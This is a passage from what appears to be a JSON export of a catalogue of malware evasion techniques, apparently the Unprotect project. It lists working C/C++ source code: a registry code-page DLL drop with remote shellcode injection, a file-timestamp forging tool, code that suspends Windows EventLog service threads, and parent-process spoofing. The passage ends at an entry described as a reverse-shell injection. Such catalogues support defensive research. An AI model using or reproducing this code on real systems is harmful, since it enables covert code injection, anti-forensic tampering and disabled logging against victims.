ERROR_FILE_NOT_FOUND)\r\n\t\t{\r\n\t\t\tif (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME),\r\n\t\t\t\tregObject->getStringSize(Index::DLL_NAME)))\r\n\t\t\t{\r\n\t\t\t\t//std::wprintf(L\"The string value of the data is: %s\\n\", ValueData);\r\n\t\t\t\tuint32_t CodePageDecimal = StringToIntDecimal(ValueData);\r\n\t\t\t\tstd::printf(\"Sucessfully created dll payload in CodePage ID %x\\n\", CodePageInt);\r\n\t\t\t\tregObject->setCodePageID(CodePageInt, 
CodePageIDIndex::CodePageHex);\r\n\t\t\t\tregObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt);\r\n\t\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", CodePageInt, CodePageDecimal);\r\n\t\t\t\tcorrectRet = true;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tCodePageInt += 1;\r\n\t}\r\n\treturn correctRet;\r\n}\r\n\r\nbool CreateProcessToInject(LPPROCESS_INFORMATION procInfo) {\r\n\tSTARTUPINFOW infoProc;\r\n\t//PROCESS_INFORMATION processInfo;\r\n\tZeroMemory(&infoProc, sizeof(infoProc));\r\n\tinfoProc.cb = sizeof(infoProc);\r\n\tZeroMemory(procInfo, sizeof(procInfo));\r\n\twchar_t path[MAX_PATH];\r\n\tGetSystemDirectoryW(path, MAX_PATH);\r\n\twcscat_s(path, MAX_PATH, L\"\\\\cmd.exe\");\r\n\treturn CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL;\r\n}\r\n\r\nbool DropSystemDllPayload(PRegistryKey regObject) {\r\n\tHMODULE hMod = GetModuleHandleA(NULL);\r\n\tHRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L\"RT_RCDATA\");\r\n\tif (hResource == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the payload dll resource, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwSizeResource = SizeofResource(hMod, hResource);\r\n\tHGLOBAL hResLoaded = LoadResource(hMod, hResource);\r\n\tif (hResLoaded == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the dll, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tauto pBuffer = static_cast<BYTE*> (LockResource(hResLoaded));\r\n\tLPWSTR pathPayload = new wchar_t[MAX_PATH];\r\n\tGetSystemDirectoryW(pathPayload, MAX_PATH);\r\n\twcscat_s(pathPayload, MAX_PATH, L\"\\\\\");\r\n\twcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME));\r\n\tregObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH);\r\n\tHANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE,\r\n\t\tNULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr);\r\n\tdelete[] pathPayload;\r\n\tif (hFile == 
INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tif (GetLastError() == ERROR_FILE_EXISTS){\r\n\t\t\tstd::printf(\"File already exists, trying to set up registry.\\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tstd::printf(\"Could not obtain HANDLE to the newly created FILE, last error is %d\\n\", GetLastError());\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwNumberBytesWritten;\r\n\tif (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr))\r\n\t{\r\n\t\tstd::printf(\"Could not write to file, last error is %d\\n\", GetLastError());\r\n\t\tCloseHandle(hFile);\r\n\t\treturn false;\r\n\t}\r\n\tCloseHandle(hFile);\r\n\treturn true;\r\n}\r\n\r\nvoid SelfSpawnPayload(DWORD dwCodePageId)\r\n{\r\n\tif (!GetConsoleWindow())\r\n\t{\r\n\t\tif (!AllocConsole()) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tif (!SetConsoleOutputCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tif (!SetConsoleCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test for SetConsoleCp: Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tSetThreadUILanguage(0);\r\n}\r\n\r\nvoid InjectStagerToPayload(PRegistryKey regObject) {\r\n\tLPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (lpCodePageID == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\tDWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that...\r\n\tLPVOID ShellcodeMemory = 
(LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (ShellcodeMemory == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//This will write the payload in the remote process.\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Need to change protection to EXECUTE_READ.\r\n\tDWORD dwProtection;\r\n\tif (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) {\r\n\t\tstd::printf(\"Could not change protection of memory for shellcode injection. Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tHANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr);\r\n\tif (hThread == INVALID_HANDLE_VALUE) {\r\n\t\tstd::printf(\"Could not open a handle to the payload .exe\\n\");\r\n\t\treturn;\r\n\t}\r\n\tstd::printf(\"Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\\n\", ShellcodeMemory, codePageID);\r\n}\r\n\r\n//Error of payload is at writing the payload.dll!\r\nbool OpenKeyForNlsModification(PRegistryKey regObject) noexcept\r\n{\r\n\tbool bResult = false; \r\n\tif (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE),\r\n\t\t0, KEY_ALL_ACCESS, &regObject->hSubkeyNls) != EXIT_SUCCESS)\r\n\t{\r\n\t\tstd::printf(\"Could not open handle to subkey of codePage!, LastError [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!DropSystemDllPayload(regObject)) {\r\n\t\tstd::printf(\"Payload dll has been failed to drop main payload \\n\");\r\n\t\treturn bResult;\r\n\t}\r\n\tif 
(!IterateCodePageAndExtractProperId(regObject)){\r\n\t\tstd::printf(\"Could not iterate key for proper modification. Last error: [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\t//DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\t//std::printf(\"The code page ID is %d\\n\", dwCodePageID);\r\n\t//SelfSpawnPayload(dwCodePageID);\r\n\tif (CreateProcessToInject(&regObject->m_procInfo))\r\n\t{\r\n\t\tInjectStagerToPayload(regObject);\r\n\t}\r\n\r\n\treturn bResult;\r\n}"
        },
        {
            "id": 83,
            "language": {
                "id": 10,
                "label": "C",
                "code_class": "C"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/165/?format=api",
            "description": "Original source and author: https://github.com/limbenjamin/nTimetools",
            "plain_code": "// #######################################################################\r\n// ############ HEADER FILES\r\n// #######################################################################\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n#include <math.h>\r\n\r\ntypedef LONG NTSTATUS;\r\nchar* VERSION_NO = \"1.1\";\r\nHANDLE file = NULL;\r\n\r\n\r\ntypedef struct _IO_STATUS_BLOCK {\r\n\tunion {\r\n\t\tNTSTATUS Status;\r\n\t\tPVOID Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS {\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFilePositionInformation = 14,\r\n\tFileEndOfFileInformation = 20,\r\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\r\n\r\ntypedef struct _FILE_BASIC_INFORMATION {\r\n\tLARGE_INTEGER CreationTime;\t\t\t\t\t\t\t// Created             \r\n\tLARGE_INTEGER LastAccessTime;                       // Accessed    \r\n\tLARGE_INTEGER LastWriteTime;                        // Modifed\r\n\tLARGE_INTEGER ChangeTime;                           // Entry Modified\r\n\tULONG FileAttributes;\r\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\r\n\r\ntypedef NTSTATUS(WINAPI *pNtSetInformationFile)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS);\r\ntypedef NTSTATUS(WINAPI *pNtQueryInformationFile)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS);\r\n\r\nHANDLE LoadFile(char *filename, FILE_BASIC_INFORMATION *fbi);\r\nVOID RetrieveFileBasicInformation(char *filename, FILE_BASIC_INFORMATION *fbi);\r\nDWORD SetFileMACE(HANDLE file, DWORD fileAttributes, char *mtimestamp, char *atimestamp, char *ctimestamp, char *btimestamp);\r\nLARGE_INTEGER ParseDateTimeInput(char *inputstring);\r\nVOID About();\r\nVOID Usage();\r\n\r\n// #######################################################################\r\n// ############ FUNCTIONS\r\n// 
#######################################################################\r\n\r\nVOID About() {\r\n\tprintf(\"nTimestomp, Version %s\\r\\n\", VERSION_NO);\r\n\tprintf(\"Copyright (C) 2019 Benjamin Lim\\r\\n\");\r\n\tprintf(\"Available for free from https://limbenjamin.com/pages/ntimetools\\r\\n\");\r\n\tprintf(\"\\r\\n\");\r\n}\r\n\r\nVOID Usage() {\r\n\tprintf(\"\\r\\n\");\r\n\tprintf(\"Usage: .\\\\nTimestomp.exe [Modified Date] [Last Access Date] [Last Write Date] [Creation Date]\\r\\n\");\r\n\tprintf(\"Date Format: yyyy-mm-dd hh:mm:ss.ddddddd\\r\\n\");\r\n\tprintf(\"\\r\\n\");\r\n}\r\n\r\nHANDLE LoadFile(char *filename, FILE_BASIC_INFORMATION *fbi) {\r\n\r\n\tHANDLE file = NULL;\r\n\tHMODULE ntdll = NULL;\r\n\r\n\tfile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);\r\n\tif (file == INVALID_HANDLE_VALUE) {\r\n\t\tprintf(\"Cannot open file: %S\\r\\n\", filename);\r\n\t\tUsage();\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tFreeLibrary(ntdll);\r\n\r\n\treturn file;\r\n}\r\n\r\n/* returns the handle on success or NULL on failure. this function opens a file and returns\r\nthe FILE_BASIC_INFORMATION on it. 
*/\r\nVOID RetrieveFileBasicInformation(HANDLE file, FILE_BASIC_INFORMATION *fbi) {\r\n\r\n\tHMODULE ntdll = NULL;\r\n\tpNtQueryInformationFile NtQueryInformationFile = NULL;\r\n\tIO_STATUS_BLOCK iostatus;\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* retrieve current timestamps including file attributes which we want to preserve */\r\n\tNtQueryInformationFile = (pNtQueryInformationFile)GetProcAddress(ntdll, \"NtQueryInformationFile\");\r\n\tif (NtQueryInformationFile == NULL) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* obtain the current file information including attributes */\r\n\tif (NtQueryInformationFile(file, &iostatus, fbi, sizeof(FILE_BASIC_INFORMATION), 4) < 0) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* clean up */\r\n\tFreeLibrary(ntdll);\r\n\r\n}\r\n\r\nDWORD SetFileMACE(HANDLE file, DWORD fileAttributes, char *mtimestamp, char *atimestamp, char *ctimestamp, char *btimestamp) {\r\n\r\n\tHMODULE ntdll = NULL;\r\n\tpNtSetInformationFile NtSetInformationFile = NULL;\r\n\tIO_STATUS_BLOCK iostatus;\r\n\r\n\tFILE_BASIC_INFORMATION fbi;\r\n\tfbi.LastWriteTime = ParseDateTimeInput(mtimestamp);\r\n\tfbi.LastAccessTime = ParseDateTimeInput(atimestamp);\r\n\tfbi.ChangeTime = ParseDateTimeInput(ctimestamp);\r\n\tfbi.CreationTime = ParseDateTimeInput(btimestamp);\r\n\t\r\n\tfbi.FileAttributes = fileAttributes;\r\n\r\n\t/* load ntdll and retrieve function pointer */\r\n\tntdll = GetModuleHandle(TEXT(\"ntdll.dll\"));\r\n\tif (ntdll == NULL) {\r\n\t\tprintf(\"Cannot load ntdll\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tNtSetInformationFile = (pNtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n\tif (NtSetInformationFile == NULL) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif 
(NtSetInformationFile(file, &iostatus, &fbi, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* clean up */\r\n\tprintf(\"File timestamp successfully set\\r\\n\");\r\n\tFreeLibrary(ntdll);\r\n\r\n\treturn 0;\r\n}\r\n\r\nLARGE_INTEGER ParseDateTimeInput(char *inputstring) {\r\n\r\n\tSYSTEMTIME systemtime = { 0 };\r\n\tLARGE_INTEGER nanoTime = { 0 };\r\n\tFILETIME filetime;\r\n\tLARGE_INTEGER dec = { 0 };\r\n\tLARGE_INTEGER res = { 0 };\r\n\r\n\tif (sscanf_s(inputstring, \"%hu-%hu-%hu %hu:%hu:%hu.%7d\", &systemtime.wYear, &systemtime.wMonth, &systemtime.wDay, &systemtime.wHour, &systemtime.wMinute, &systemtime.wSecond, &dec.QuadPart) == 0) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* sanitize input */\r\n\r\n\tif (systemtime.wMonth < 1 || systemtime.wMonth > 12) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wDay < 1 || systemtime.wDay > 31) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wYear < 1601 || systemtime.wYear > 30827) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (systemtime.wMinute < 0 || systemtime.wMinute > 59) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\tif (systemtime.wSecond < 0 || systemtime.wSecond > 59) {\r\n\t\tprintf(\"Wrong Date Format\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tsystemtime.wMilliseconds = 0;\r\n\tif (SystemTimeToFileTime(&systemtime, &filetime) == 0) {\r\n\t\tprintf(\"Invalid filetime\\r\\n\");\r\n\t\tCloseHandle(file);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tnanoTime.LowPart = filetime.dwLowDateTime;\r\n\tnanoTime.HighPart = filetime.dwHighDateTime;\r\n\r\n\tres.QuadPart = nanoTime.QuadPart + dec.QuadPart;\r\n\r\n\treturn res;\r\n}\r\n\r\n/* returns 0 on error, 1 on 
success. this function converts a LARGE_INTEGER to a SYSTEMTIME structure */\r\nDWORD ConvertLargeIntegerToLocalTime(SYSTEMTIME *localsystemtime, LARGE_INTEGER largeinteger) {\r\n\r\n\tFILETIME filetime;\r\n\tFILETIME localfiletime;\r\n\tDWORD result = 0;\r\n\r\n\tfiletime.dwLowDateTime = largeinteger.LowPart;\r\n\tfiletime.dwHighDateTime = largeinteger.HighPart;\r\n\r\n\tif (FileTimeToSystemTime(&filetime, localsystemtime) == 0) {\r\n\t\tprintf(\"Invalid filetime\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n\tif (argc < 5) {\r\n\t\tUsage();\r\n\t\texit(1);\r\n\t}\r\n\r\n\tFILE_BASIC_INFORMATION fbi; \r\n\tstruct _SYSTEMTIME time = { 0 };\r\n\twchar_t filename[4096] = { 0 };\r\n\tchar str[256];\r\n\tCHAR lpVolumeNameBuffer[MAX_PATH + 1] = { 0 };\r\n\tCHAR lpFileSystemNameBuffer[MAX_PATH + 1] = { 0 };\r\n\tLARGE_INTEGER lpFileSizeHigh = { 0 };\r\n\r\n\tAbout();\r\n\tMultiByteToWideChar(CP_ACP, 0, argv[1], -1, filename, 4096);\r\n\tfile = LoadFile(filename, &fbi);\r\n\tGetVolumeInformationByHandleW(file, &lpVolumeNameBuffer, ARRAYSIZE(lpVolumeNameBuffer), 0, 0, 0, &lpFileSystemNameBuffer, ARRAYSIZE(lpVolumeNameBuffer));\r\n\tGetFileSizeEx(file, &lpFileSizeHigh);\r\n\r\n\tprintf(\"Filesystem type:\t\t%S\\r\\n\", lpFileSystemNameBuffer);\r\n\tprintf(\"Filename:\t\t\t%S\\r\\n\", filename);\r\n\tprintf(\"File size:\t\t\t%d\\r\\n\", lpFileSizeHigh.QuadPart);\r\n\tprintf(\"\\r\\n\");\r\n\r\n\tSetFileMACE(file, fbi.FileAttributes, argv[2], argv[3], argv[4], argv[5]);\r\n\tRetrieveFileBasicInformation(file, &fbi);\r\n\r\n\tprintf(\"\\r\\n\");\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.LastWriteTime);\r\n\tif (fbi.LastWriteTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.LastWriteTime.QuadPart);\r\n\t\tprintf(\"[M] Last Write Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse 
{\r\n\t\tprintf(\"[M] Last Write Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.LastAccessTime);\r\n\tif (fbi.LastAccessTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.LastAccessTime.QuadPart);\r\n\t\tprintf(\"[A] Last Access Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[A] Last Access Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.ChangeTime);\r\n\tif (fbi.ChangeTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.ChangeTime.QuadPart);\r\n\t\tprintf(\"[C] Metadata Change Time:\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[C] Metadata Change Time:\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\r\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tmemset(&time, 0, sizeof(time));\r\n\r\n\tConvertLargeIntegerToLocalTime(&time, fbi.CreationTime);\r\n\tif (fbi.CreationTime.QuadPart != 0) {\r\n\t\tsprintf_s(str, 256, \"%lld\", fbi.CreationTime.QuadPart);\r\n\t\tprintf(\"[B] Creation Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.%7s UTC\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond, &str[11]);\r\n\t}\r\n\telse {\r\n\t\tprintf(\"[B] Creation Time:\t\t%04d-%02d-%02d %02d:%02d:%02d.0000000 UTC\\n\", time.wYear, time.wMonth, time.wDay, time.wHour, time.wMinute, time.wSecond);\r\n\t}\r\n\tprintf(\"\\r\\n\");\r\n\tCloseHandle(file);\r\n}"
        },
        {
            "id": 84,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/172/?format=api",
            "description": "Original source code: https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog-service-threads",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <TlHelp32.h>\r\n#include <dbghelp.h>\r\n#include <winternl.h>\r\n\r\n#pragma comment(lib, \"DbgHelp\")\r\n\r\nusing myNtQueryInformationThread = NTSTATUS(NTAPI*)(\r\n\tIN HANDLE          ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID          ThreadInformation,\r\n\tIN ULONG           ThreadInformationLength,\r\n\tOUT PULONG         ReturnLength\r\n\t);\r\n\r\nint main()\r\n{\r\n\tHANDLE serviceProcessHandle;\r\n\tHANDLE snapshotHandle;\r\n\tHANDLE threadHandle;\r\n\r\n\tHMODULE modules[256] = {};\r\n\tSIZE_T modulesSize = sizeof(modules);\r\n\tDWORD modulesSizeNeeded = 0;\r\n\tDWORD moduleNameSize = 0;\r\n\tSIZE_T modulesCount = 0;\r\n\tWCHAR remoteModuleName[128] = {};\r\n\tHMODULE serviceModule = NULL;\r\n\tMODULEINFO serviceModuleInfo = {};\r\n\tDWORD_PTR threadStartAddress = 0;\r\n\tDWORD bytesNeeded = 0;\r\n\r\n\tmyNtQueryInformationThread NtQueryInformationThread = (myNtQueryInformationThread)(GetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtQueryInformationThread\"));\r\n\r\n\tTHREADENTRY32 threadEntry;\r\n\tthreadEntry.dwSize = sizeof(THREADENTRY32);\r\n\r\n\tSC_HANDLE sc = OpenSCManagerA(\".\", NULL, MAXIMUM_ALLOWED);\r\n\tSC_HANDLE service = OpenServiceA(sc, \"EventLog\", MAXIMUM_ALLOWED);\r\n\r\n\tSERVICE_STATUS_PROCESS serviceStatusProcess = {};\r\n\r\n\t# Get PID of svchost.exe that hosts EventLog service\r\n\tQueryServiceStatusEx(service, SC_STATUS_PROCESS_INFO, (LPBYTE)&serviceStatusProcess, sizeof(serviceStatusProcess), &bytesNeeded);\r\n\tDWORD servicePID = serviceStatusProcess.dwProcessId;\r\n\r\n\t# Open handle to the svchost.exe\r\n\tserviceProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, servicePID);\r\n\tsnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n\r\n\t# Get a list of modules loaded by svchost.exe\r\n\tEnumProcessModules(serviceProcessHandle, modules, modulesSize, 
&modulesSizeNeeded);\r\n\tmodulesCount = modulesSizeNeeded / sizeof(HMODULE);\r\n\tfor (size_t i = 0; i < modulesCount; i++)\r\n\t{\r\n\t\tserviceModule = modules[i];\r\n\r\n\t\t# Get loaded module's name\r\n\t\tGetModuleBaseName(serviceProcessHandle, serviceModule, remoteModuleName, sizeof(remoteModuleName));\r\n\r\n\t\tif (wcscmp(remoteModuleName, L\"wevtsvc.dll\") == 0)\r\n\t\t{\r\n\t\t\tprintf(\"Windows EventLog module %S at %p\\n\\n\", remoteModuleName, serviceModule);\r\n\t\t\tGetModuleInformation(serviceProcessHandle, serviceModule, &serviceModuleInfo, sizeof(MODULEINFO));\r\n\t\t}\r\n\t}\r\n\r\n\t# Enumerate threads\r\n\tThread32First(snapshotHandle, &threadEntry);\r\n\twhile (Thread32Next(snapshotHandle, &threadEntry))\r\n\t{\r\n\t\tif (threadEntry.th32OwnerProcessID == servicePID)\r\n\t\t{\r\n\t\t\tthreadHandle = OpenThread(MAXIMUM_ALLOWED, FALSE, threadEntry.th32ThreadID);\r\n\t\t\tNtQueryInformationThread(threadHandle, (THREADINFOCLASS)0x9, &threadStartAddress, sizeof(DWORD_PTR), NULL);\r\n\t\t\t\r\n\t\t\t# Check if thread's start address is inside wevtsvc.dll memory range\r\n\t\t\tif (threadStartAddress >= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll && threadStartAddress <= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll + serviceModuleInfo.SizeOfImage)\r\n\t\t\t{\r\n\t\t\t\tprintf(\"Suspending EventLog thread %d with start address %p\\n\", threadEntry.th32ThreadID, threadStartAddress);\r\n\r\n\t\t\t\t# Suspend EventLog service thread\r\n\t\t\t\tSuspendThread(threadHandle);\r\n\t\t\t\tSleep(2000);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn 0;\r\n}"
        },
        {
            "id": 85,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/173/?format=api",
            "description": "Original source code: https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
            "plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nint main() \r\n{\r\n\tSTARTUPINFOEXA si;\r\n\tPROCESS_INFORMATION pi;\r\n\tSIZE_T attributeSize;\r\n\tZeroMemory(&si, sizeof(STARTUPINFOEXA));\r\n\t\r\n\tHANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 6200);\r\n\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);\r\n\tsi.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);\r\n\tInitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);\r\n\tUpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsi.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(NULL, (LPSTR)\"notepad\", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);\r\n\r\n\treturn 0;\r\n}"
        },
        {
            "id": 86,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/118/?format=api",
            "description": "The code below injects the shellcode into a notepad.exe process with PID 5428, which initiates a reverse shell back to the attacker.\r\nOriginal source code: https://www.ired.team/offensive-security/code-injection-process-injection/process-injection",
